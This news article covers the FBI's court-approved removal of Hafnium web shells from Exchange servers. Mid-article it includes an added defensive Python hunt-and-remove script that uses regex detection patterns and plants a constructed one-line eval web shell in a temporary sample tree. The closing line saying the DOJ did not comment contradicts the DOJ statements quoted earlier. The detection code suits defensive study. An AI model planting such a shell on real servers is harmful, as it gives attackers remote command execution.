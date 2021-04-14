



A court in Houston has approved an FBI operation to "copy and delete" backdoors from hundreds of Microsoft Exchange email servers in the United States, months after hackers attacked thousands of networks by exploiting four previously unknown vulnerabilities.

The Justice Department announced the operation on Tuesday, saying it was “successful.”

In March, Microsoft discovered that a new Chinese state-sponsored hacking group, Hafnium, was targeting on-premises Exchange servers running on corporate networks. A chain of four vulnerabilities allowed the hackers to break into a vulnerable Exchange server and steal its contents. Microsoft released patches for the vulnerabilities, but patching does not remove the backdoors already planted on servers that had been compromised. Within days, other hacking groups began attacking still-vulnerable servers with the same flaws to deploy ransomware.

As the patches were applied, the number of vulnerable servers fell. However, the Department of Justice said in a statement that some owners found the backdoors difficult to locate and remove, leaving hundreds of Exchange servers still compromised.

"This operation removed web shells left behind by one early hacking group, which could have been used to maintain and escalate persistent, unauthorized access to U.S. networks," the statement said. "The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path)."
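The two difficulties described above, finding web shells that were left behind and removing only the exact file that was identified, are illustrated by the following added example. It is not code from the article, the FBI, or Microsoft; it is a small Python hunt-and-remove routine written for this page. It scans a web root for ASPX files that look like one-file web shells (a server-side script block that feeds request input to an evaluator or process launcher; the heuristic regexes are an assumption, not a published signature), records each hit with its path and SHA-256, and then deletes only paths that were explicitly listed and whose content still matches the recorded hash. The sample directory tree is constructed in a temporary folder and does not reflect any real server.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristic markers of a one-file ASP.NET web shell (assumption: tune for your
# environment). Legitimate pages use Request too, but rarely hand its contents
# straight to eval() or a process launcher from a server-side script block.
_SERVER_SCRIPT = re.compile(r'<script[^>]*runat\s*=\s*"?server"?', re.I)
_REQUEST_INPUT = re.compile(r'Request\s*(\[|\.Item|\.Form|\.QueryString|\.Headers)', re.I)
_EXECUTION = re.compile(r'\beval\s*\(|Process\.Start|"unsafe"|ProcessStartInfo', re.I)


def is_suspicious(text: str) -> bool:
    """All three markers must be present in the same file."""
    return bool(_SERVER_SCRIPT.search(text)
                and _REQUEST_INPUT.search(text)
                and _EXECUTION.search(text))


def sha256_file(path: str) -> str:
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def find_candidate_shells(web_root: str) -> list[dict]:
    """Walk the web root and return one record per suspicious .aspx file."""
    hits = []
    for p in sorted(Path(web_root).rglob("*.aspx")):
        if is_suspicious(p.read_text(errors="replace")):
            hits.append({"path": str(p), "name": p.name, "sha256": sha256_file(str(p))})
    return hits


def remove_listed_shells(targets: dict[str, str], dry_run: bool = True) -> dict[str, str]:
    """Delete only the listed paths, and only if each still hashes to the value
    recorded when it was identified. Anything that changed since, or is already
    gone, is reported and left alone. Returns an outcome per path."""
    outcome = {}
    for path, expected_sha256 in targets.items():
        p = Path(path)
        if not p.is_file():
            outcome[path] = "missing"
        elif sha256_file(path) != expected_sha256:
            outcome[path] = "hash-mismatch"   # not the file we identified; do not touch
        elif dry_run:
            outcome[path] = "would-delete"
        else:
            p.unlink()
            outcome[path] = "deleted"
    return outcome


def build_sample_tree() -> str:
    """Constructed sample tree: two benign pages and one planted shell."""
    root = Path(tempfile.mkdtemp(prefix="exchange-sample-"))
    auth = root / "FrontEnd" / "HttpProxy" / "owa" / "auth"
    auth.mkdir(parents=True)
    (auth / "logon.aspx").write_text(
        '<%@ Page Language="C#" %>\n<html><body>Sign in</body></html>\n')
    # Constructed shell body modelled on a typical one-line eval shell.
    (auth / "help.aspx").write_text(
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>\n')
    client = root / "aspnet_client"
    client.mkdir()
    (client / "system_web.aspx").write_text(
        '<%@ Page %>\n<script runat="server">'
        'void Page_Load(){Response.Write("ok");}</script>\n')
    return str(root)


if __name__ == "__main__":
    sample_root = build_sample_tree()
    found = find_candidate_shells(sample_root)
    for hit in found:
        print(f"candidate: {hit['path']} sha256={hit['sha256']}")
    # Dry run first; switch to dry_run=False only after a human reviews the list.
    print(remove_listed_shells({h["path"]: h["sha256"] for h in found}))
```

The hash check is the point a practitioner should not skip: the deletion is keyed to the exact file that was identified, so a page that was rewritten, replaced or cleaned between identification and removal is reported rather than deleted. Run on a real server only from an interactive session with the dry run reviewed first, and preserve a copy of each hit before unlinking it so the evidence survives the cleanup.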

The FBI said it is attempting to notify, by email, the owners of the servers from which it removed the backdoors.

Assistant Attorney General John C. Demers said the operation "demonstrates the department's commitment to disrupt hacking activity using all of our legal tools, not just prosecutions."

The Department of Justice also said the operation only removed the backdoors; it did not patch the vulnerabilities the hackers exploited, nor did it remove any other malware the hackers may have left behind.

This is believed to be the first known case of the FBI effectively cleaning up private networks after a cyberattack. In 2016, the Supreme Court approved a rule change allowing US judges to issue search and seizure warrants outside their own districts. Critics opposed the change at the time, fearing the FBI could ask friendly courts to authorize cyber operations anywhere in the world.

Authorities in other countries, such as France, have used similar powers to hijack botnets and shut them down remotely.

Neither the FBI nor the Department of Justice commented by press time.

